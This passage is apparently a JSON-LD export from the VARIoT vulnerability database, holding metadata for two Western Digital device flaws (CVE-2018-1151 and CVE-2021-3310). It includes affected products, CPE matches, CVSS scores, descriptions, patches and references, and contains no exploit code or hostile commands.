"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201806-0898",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tv live hub",
"scope": "eq",
"trust": 1.0,
"vendor": "westerndigital",
"version": "3.12.13"
},
{
"model": "tv media player",
"scope": "eq",
"trust": 1.0,
"vendor": "westerndigital",
"version": "1.03.07"
},
{
"model": "tv live hub",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "3.12.13"
},
{
"model": "tv media player",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "1.03.07"
},
{
"model": "tv live hub",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "3.12.13"
},
{
"model": "tv media player",
"scope": "eq",
"trust": 0.6,
"vendor": "wdc",
"version": "1.03.07"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"db": "NVD",
"id": "CVE-2018-1151"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:tv_live_hub_firmware:3.12.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:tv_live_hub:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:tv_media_player_firmware:1.03.07:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:tv_media_player:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-1151"
}
]
},
"cve": "CVE-2018-1151",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-1151",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-121376",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-1151",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-1151",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201806-725",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-121376",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-1151",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121376"
},
{
"db": "VULMON",
"id": "CVE-2018-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"db": "NVD",
"id": "CVE-2018-1151"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web server on Western Digital TV Media Player 1.03.07 and TV Live Hub 3.12.13 allow unauthenticated remote attackers to execute arbitrary code or cause denial of service via crafted HTTP requests to toServerValue.cgi",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"db": "VULHUB",
"id": "VHN-121376"
},
{
"db": "VULMON",
"id": "CVE-2018-1151"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TENABLE",
"id": "TRA-2018-14",
"trust": 2.6
},
{
"db": "NVD",
"id": "CVE-2018-1151",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006292",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201806-725",
"trust": 0.7
},
{
"db": "SEEBUG",
"id": "SSVID-97554",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-121376",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-1151",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121376"
},
{
"db": "VULMON",
"id": "CVE-2018-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"db": "NVD",
"id": "CVE-2018-1151"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
]
},
"id": "VAR-201806-0898",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-121376"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:43:41.397000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.wdc.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121376"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"db": "NVD",
"id": "CVE-2018-1151"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.tenable.com/security/research/tra-2018-14"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-1151"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1151"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121376"
},
{
"db": "VULMON",
"id": "CVE-2018-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"db": "NVD",
"id": "CVE-2018-1151"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-121376"
},
{
"db": "VULMON",
"id": "CVE-2018-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"db": "NVD",
"id": "CVE-2018-1151"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "VULHUB",
"id": "VHN-121376"
},
{
"date": "2018-06-12T00:00:00",
"db": "VULMON",
"id": "CVE-2018-1151"
},
{
"date": "2018-08-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"date": "2018-06-12T17:29:00.397000",
"db": "NVD",
"id": "CVE-2018-1151"
},
{
"date": "2018-06-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-28T00:00:00",
"db": "VULHUB",
"id": "VHN-121376"
},
{
"date": "2019-05-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-1151"
},
{
"date": "2018-08-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006292"
},
{
"date": "2019-05-28T14:13:10.367000",
"db": "NVD",
"id": "CVE-2018-1151"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital TV Media Player and TV Live Hub Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006292"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-725"
}
],
"trust": 0.6
}
}
VAR-202103-1086
Vulnerability from variot - Updated: 2023-12-18 13:42Western Digital My Cloud OS 5 devices before 5.10.122 mishandle Symbolic Link Following on SMB and AFP shares. This can lead to code execution and information disclosure (by reading local files). This vulnerability allows remote attackers to disclose sensitive information on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability.The specific flaw exists within the SMB and AFP services. By creating a symbolic link, an attacker can abuse the service to read arbitrary files. An attacker can leverage this vulnerability to disclose information in the context of the service account. Western Digital My Cloud is a personal cloud storage device of Western Digital Corporation
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202103-1086",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud os",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "5.10.122"
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "my cloud os 5 firmware 5.10.122"
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "mycloud pr4100",
"scope": null,
"trust": 0.7,
"vendor": "western digital",
"version": null
},
{
"model": "digital my cloud os",
"scope": "eq",
"trust": 0.6,
"vendor": "western",
"version": "5\u003c5.10.122"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"db": "NVD",
"id": "CVE-2021-3310"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_os:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.10.122",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2_ultra:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_mirror_gen_2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3310"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Chris Hernandez",
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-277"
}
],
"trust": 0.7
},
"cve": "CVE-2021-3310",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2021-3310",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2022-06495",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-3310",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ZDI",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-3310",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-3310",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2021-3310",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2022-06495",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202103-759",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-3310",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"db": "VULMON",
"id": "CVE-2021-3310"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"db": "NVD",
"id": "CVE-2021-3310"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital My Cloud OS 5 devices before 5.10.122 mishandle Symbolic Link Following on SMB and AFP shares. This can lead to code execution and information disclosure (by reading local files). This vulnerability allows remote attackers to disclose sensitive information on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability.The specific flaw exists within the SMB and AFP services. By creating a symbolic link, an attacker can abuse the service to read arbitrary files. An attacker can leverage this vulnerability to disclose information in the context of the service account. Western Digital My Cloud is a personal cloud storage device of Western Digital Corporation",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3310"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"db": "VULMON",
"id": "CVE-2021-3310"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-3310",
"trust": 3.8
},
{
"db": "ZDI",
"id": "ZDI-21-277",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004443",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-12455",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2022-06495",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202103-759",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-3310",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"db": "VULMON",
"id": "CVE-2021-3310"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"db": "NVD",
"id": "CVE-2021-3310"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
]
},
"id": "VAR-202103-1086",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06495"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06495"
}
]
},
"last_update_date": "2023-12-18T13:42:38.971000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "WDC-21002",
"trust": 0.8,
"url": "https://www.westerndigital.com/support/product-security/wdc-21002-my-cloud-firmware-version-5-10-122"
},
{
"title": "Western Digital has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-21002-my-cloud-firmware-version-5-10-122"
},
{
"title": "Patch for Western Digital My Cloud OS 5 Backlink Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/315876"
},
{
"title": "Western Digital My Cloud Post-link vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=144474"
},
{
"title": "PoC",
"trust": 0.1,
"url": "https://github.com/jonathan-elias/poc "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"db": "VULMON",
"id": "CVE-2021-3310"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-759"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-59",
"trust": 1.0
},
{
"problemtype": "Link interpretation problem (CWE-59) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"db": "NVD",
"id": "CVE-2021-3310"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.zerodayinitiative.com/advisories/zdi-21-277/"
},
{
"trust": 2.4,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-21002-my-cloud-firmware-version-5-10-122"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3310"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/59.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-277"
},
{
"db": "CNVD",
"id": "CNVD-2022-06495"
},
{
"db": "VULMON",
"id": "CVE-2021-3310"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004443"
},
{
"db": "NVD",
"id": "CVE-2021-3310"
